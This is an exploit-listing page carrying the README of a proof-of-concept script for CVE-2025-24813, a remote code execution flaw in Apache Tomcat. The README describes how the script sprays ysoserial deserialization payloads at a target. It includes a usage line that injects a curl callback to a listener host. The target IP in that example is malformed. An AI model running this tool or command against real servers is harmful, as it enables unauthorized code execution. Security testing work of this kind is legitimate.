## https://sploitus.com/exploit?id=1B99D3CB-A64E-5B09-A474-D186DA3AEC1B
CVE-2025-24813-PoC
===
CVE-2025-24813 affects Apache Tomcat - if it's a vulnerable version and spectacularly misconfigured, an attacker can get RCE with one GET and one POST.
More info [here](https://www.rapid7.com/blog/post/2025/03/19/etr-apache-tomcat-cve-2025-24813-what-you-need-to-know/)
This is Yiheng An, Jun Li, Qiang Liu, Haozhe Zhang, Qi Deng's script from the recent [writeup](https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-03-14-Testing-CVE-2025-24813.md) modified to accept a command, generate all ysoserial gadget payloads and send them to your target.
Shared in the interest of ethical security testing.
Usage example:
```
python3 exploit.py --command 'curl http://yourcollaburl' --target 'http://192.168.10.0.1:8080' --proxy '127.0.0.1:8080'
```
`poc.mp4` shows the script in action, generating the payloads and sending them to the target, and in the right-hand pane we see the interact listener is being called.